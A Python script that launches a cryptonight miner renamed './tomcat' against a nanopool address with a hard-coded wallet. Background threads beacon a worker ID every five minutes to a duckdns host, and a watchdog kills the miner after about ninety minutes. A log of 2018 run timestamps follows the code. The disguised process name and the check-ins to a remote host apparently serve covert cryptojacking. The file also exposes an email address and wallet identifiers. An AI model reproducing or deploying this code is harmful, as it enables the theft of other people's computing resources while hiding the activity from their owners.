import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:12:01.403866
#2018-02-17 15:57:07.246563
#2018-02-17 17:46:07.710724
#2018-02-17 19:34:07.005860
#2018-02-17 21:23:01.573011
#2018-02-17 23:07:06.222548
#2018-02-18 00:54:04.880003
#2018-02-18 02:42:02.094836
#2018-02-18 04:31:06.627683
#2018-02-18 06:22:06.421175
#2018-02-18 08:13:06.806387
#2018-02-18 10:01:06.154669
#2018-02-18 11:47:06.987078
#2018-02-18 13:32:06.709797
#2018-02-18 15:22:06.771531
#2018-02-18 17:11:06.386892
#2018-02-18 18:59:07.847085
#2018-02-18 20:46:04.159218
#2018-02-18 22:32:05.948359
#2018-02-19 00:20:07.304551
#2018-02-19 02:06:07.464043
#2018-02-19 03:53:05.272609
#2018-02-19 05:38:05.573553
#2018-02-19 07:26:04.632752
#2018-02-19 09:16:07.197995
#2018-02-19 11:05:04.507677
#2018-02-19 12:52:01.267447
#2018-02-19 14:42:08.829814
#2018-02-19 16:29:05.924866
#2018-02-19 18:16:04.231692
#2018-02-19 20:02:02.011757
#2018-02-19 21:50:06.871343
#2018-02-19 23:37:05.541196
#2018-02-20 01:23:05.553400
#2018-02-20 03:13:07.871395
#2018-02-20 05:00:01.524663
#2018-02-20 06:42:08.412062
#2018-02-20 08:27:05.489582
#2018-02-20 10:12:04.980798
#2018-02-20 11:56:08.891594
#2018-02-20 13:45:10.552097
#2018-02-20 15:29:06.203108
#2018-02-20 17:14:08.297163
#2018-02-20 19:04:10.713953
#2018-02-20 20:53:07.125204
#2018-02-20 22:37:06.819779
#2018-02-21 00:18:07.180630
#2018-02-21 02:04:07.329379
#2018-02-21 03:52:06.822430
#2018-02-21 05:41:08.103637
#2018-02-21 07:31:05.367646
#2018-02-21 09:16:01.810830
#2018-02-21 11:04:11.032334
#2018-02-21 12:50:13.111528
#2018-02-21 14:38:09.991497
#2018-02-21 16:24:06.693687
#2018-02-21 18:14:06.615371
#2018-02-21 20:00:13.058689
#2018-02-21 21:48:01.428994
#2018-02-21 23:37:04.540238
#2018-02-22 01:25:05.239292
#2018-02-22 03:13:08.622408
#2018-02-22 05:01:05.565535
#2018-02-22 06:44:07.140439
#2018-02-22 08:32:08.915735
#2018-02-22 10:18:01.930509
#2018-02-22 12:03:10.242212
#2018-02-22 13:48:06.427264
#2018-02-22 15:36:06.354385
#2018-02-22 17:22:04.310710
#2018-02-22 19:08:08.305129
#2018-02-22 21:01:05.743600
#2018-02-22 22:46:08.277662
#2018-02-23 00:33:05.683041
#2018-02-23 02:19:05.999390
#2018-02-23 04:08:06.946162
#2018-02-23 05:54:06.567547
#2018-02-23 07:44:06.596645
#2018-02-23 09:50:03.046785
#2018-02-23 11:49:07.457261
#2018-02-23 13:38:04.117764
#2018-02-23 15:24:09.311853
#2018-02-23 17:13:11.253654
#2018-02-23 18:57:05.126410
#2018-02-23 20:44:04.239197
#2018-02-23 22:33:06.198351
#2018-02-24 00:18:07.642919
#2018-02-24 02:11:07.568714
#2018-02-24 04:01:01.443686
#2018-02-24 06:42:01.829238
#2018-02-24 08:31:03.766656
#2018-02-24 10:18:06.989039
#2018-02-24 12:13:03.984908
#2018-02-24 13:59:01.284292
#2018-02-24 15:50:06.235865
#2018-02-24 17:44:04.503478
#2018-02-24 19:29:04.087847
#2018-02-24 21:18:07.326159
#2018-02-24 23:56:07.374456
#2018-02-25 03:12:05.404437
#2018-02-25 06:56:07.287110